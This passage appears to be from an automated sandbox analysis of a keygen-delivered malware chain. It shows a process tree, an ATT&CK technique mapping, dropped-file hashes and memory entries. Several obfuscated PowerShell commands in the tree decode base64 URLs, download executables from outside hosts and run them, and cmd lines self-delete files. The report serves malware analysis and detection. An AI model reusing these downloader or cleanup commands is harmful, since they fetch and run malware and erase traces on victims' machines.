                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Blocklisted process makes network request
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1252
                      • C:\Users\Public\gio.exe
                        "C:\Users\Public\gio.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2584
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                          6⤵
                          • Loads dropped DLL
                          PID:2344
                          • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1876
                            • C:\Windows\SysWOW64\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                              8⤵
                              • Loads dropped DLL
                              PID:3032
                              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                9⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1620
                                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                  "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                  10⤵
                                  • Executes dropped EXE
                                  PID:1608
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                              "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                              8⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              PID:3048
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /pid 3048 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\115692875527575\\* & exit
                                9⤵
                                  PID:840
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /pid 3048
                                    10⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1116
                          • C:\Users\Public\gio.exe
                            "C:\Users\Public\gio.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:2360
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\9878.tmp\b1.hta"
                      3⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of WriteProcessMemory
                      PID:1628
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1460
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 2
                      3⤵
                      • Delays execution with timeout.exe
                      PID:1560
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\9878.tmp\ba.hta"
                      3⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of WriteProcessMemory
                      PID:1348
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Blocklisted process makes network request
                        • Loads dropped DLL
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:968
                        • C:\Users\Public\czx.exe
                          "C:\Users\Public\czx.exe"
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:2584
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                            6⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            PID:1864
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                              7⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              PID:3004
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /pid 3004 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\128667598653610\\* & exit
                                8⤵
                                  PID:940
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /pid 3004
                                    9⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2932
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                              "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: MapViewOfSection
                              • Suspicious use of SetWindowsHookEx
                              PID:2468
                              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:428
                            • C:\Users\Public\czx.exe
                              "C:\Users\Public\czx.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:2280
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\9878.tmp\ba1.hta"
                        3⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        PID:2012
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1768

                  Network

                  MITRE ATT&CK Matrix ATT&CK v6

                  Persistence

                  Modify Existing Service

                  1
                  T1031

                  Registry Run Keys / Startup Folder

                  1
                  T1060

                  Defense Evasion

                  Modify Registry

                  6
                  T1112

                  Disabling Security Tools

                  2
                  T1089

                  Install Root Certificate

                  1
                  T1130

                  Credential Access

                  Credentials in Files

                  3
                  T1081

                  Discovery

                  Query Registry

                  2
                  T1012

                  System Information Discovery

                  2
                  T1082

                  Collection

                  Data from Local System

                  3
                  T1005

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a1733a9-c78a-41f9-ba49-7e78bc3e775b
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2655e6d2-9831-4dc2-b784-d7198ebfa68e
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_31350474-e9bc-4444-946a-bd38bd3aac12
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4c2c91d1-8606-477f-8094-c3fae66706c3
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_97862896-b30a-4f59-9fb6-9a9c3cb9fbd2
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f9030962-9e0d-4894-ac40-7b6b27efba3e
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Temp\3lNZvo0fRd.exe
                  • C:\Users\Admin\AppData\Local\Temp\3lNZvo0fRd.exe
                  • C:\Users\Admin\AppData\Local\Temp\9878.tmp\Keygen.exe
                  • C:\Users\Admin\AppData\Local\Temp\9878.tmp\Keygen.exe
                  • C:\Users\Admin\AppData\Local\Temp\9878.tmp\b.hta
                  • C:\Users\Admin\AppData\Local\Temp\9878.tmp\b1.hta
                  • C:\Users\Admin\AppData\Local\Temp\9878.tmp\ba.hta
                  • C:\Users\Admin\AppData\Local\Temp\9878.tmp\ba1.hta
                  • C:\Users\Admin\AppData\Local\Temp\9878.tmp\m.hta
                  • C:\Users\Admin\AppData\Local\Temp\9878.tmp\m1.hta
                  • C:\Users\Admin\AppData\Local\Temp\9878.tmp\start.bat
                  • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\KflFMhcGIe.exe
                  • C:\Users\Admin\AppData\Local\Temp\KflFMhcGIe.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\O5gW8ZYuxe.exe
                    MD5

                    013db621a3351e3fb049efd2ccad79ff

                    SHA1

                    a23394ea54dbc5342a77938a2c285ee616185560

                    SHA256

                    df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                    SHA512

                    1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                  • C:\Users\Admin\AppData\Local\Temp\O5gW8ZYuxe.exe
                  • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                  • C:\Users\Admin\AppData\Local\Temp\ScYwwBnh7I.exe
                  • C:\Users\Admin\AppData\Local\Temp\ScYwwBnh7I.exe
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Public\Natso.bat
                  • C:\Users\Public\czx.exe
                  • C:\Users\Public\czx.exe
                  • C:\Users\Public\czx.exe
                  • C:\Users\Public\gio.exe
                  • C:\Users\Public\gio.exe
                  • C:\Users\Public\gio.exe
                  • C:\Users\Public\osc.exe
                  • C:\Users\Public\osc.exe
                  • C:\Users\Public\osc.exe
                  • C:\Windows\temp\yk2omq10.inf
                  • \??\PIPE\lsarpc
                  • \??\PIPE\srvsvc
                  • \??\PIPE\srvsvc
                  • \ProgramData\mozglue.dll
                  • \ProgramData\mozglue.dll
                  • \ProgramData\mozglue.dll
                  • \ProgramData\msvcp140.dll
                  • \ProgramData\msvcp140.dll
                  • \ProgramData\msvcp140.dll
                  • \ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • \ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • \ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • \ProgramData\sqlite3.dll
                  • \ProgramData\sqlite3.dll
                  • \ProgramData\sqlite3.dll
                  • \ProgramData\vcruntime140.dll
                  • \ProgramData\vcruntime140.dll
                  • \ProgramData\vcruntime140.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                    MD5

                    02cc7b8ee30056d5912de54f1bdfc219

                    SHA1

                    a6923da95705fb81e368ae48f93d28522ef552fb

                    SHA256

                    1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                    SHA512

                    0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
                  • \Users\Admin\AppData\LocalLow\sqlite3.dll
                  • \Users\Admin\AppData\Local\Temp\3lNZvo0fRd.exe
                  • \Users\Admin\AppData\Local\Temp\9878.tmp\Keygen.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\KflFMhcGIe.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\O5gW8ZYuxe.exe
                    MD5

                    013db621a3351e3fb049efd2ccad79ff

                    SHA1

                    a23394ea54dbc5342a77938a2c285ee616185560

                    SHA256

                    df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                    SHA512

                    1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                  • \Users\Admin\AppData\Local\Temp\ScYwwBnh7I.exe
                  • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • \Users\Public\czx.exe
                  • \Users\Public\czx.exe
                  • \Users\Public\gio.exe
                  • \Users\Public\osc.exe
                  • \Users\Public\osc.exe
                  • memory/428-311-0x000000000041A684-mapping.dmp
                  • memory/784-383-0x0000000002850000-0x0000000002851000-memory.dmp
                    Filesize

                    4KB

                  • memory/784-384-0x0000000004B50000-0x0000000004B51000-memory.dmp
                    Filesize

                    4KB

                  • memory/784-382-0x0000000004BB0000-0x0000000004BB1000-memory.dmp
                    Filesize

                    4KB

                  • memory/784-381-0x00000000023D0000-0x00000000023D1000-memory.dmp
                    Filesize

                    4KB

                  • memory/784-380-0x0000000073BA0000-0x000000007428E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/784-376-0x0000000000000000-mapping.dmp
                  • memory/796-371-0x00000000049C0000-0x00000000049C1000-memory.dmp
                    Filesize

                    4KB

                  • memory/796-370-0x0000000002610000-0x0000000002611000-memory.dmp
                    Filesize

                    4KB

                  • memory/796-369-0x0000000004B30000-0x0000000004B31000-memory.dmp
                    Filesize

                    4KB

                  • memory/796-368-0x0000000001060000-0x0000000001061000-memory.dmp
                    Filesize

                    4KB

                  • memory/796-367-0x0000000073BA0000-0x000000007428E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/796-363-0x0000000000000000-mapping.dmp
                  • memory/840-260-0x0000000000000000-mapping.dmp
                  • memory/940-322-0x0000000000000000-mapping.dmp
                  • memory/968-273-0x0000000006500000-0x0000000006501000-memory.dmp
                    Filesize

                    4KB

                  • memory/968-31-0x0000000071AB0000-0x000000007219E000-memory.dmp
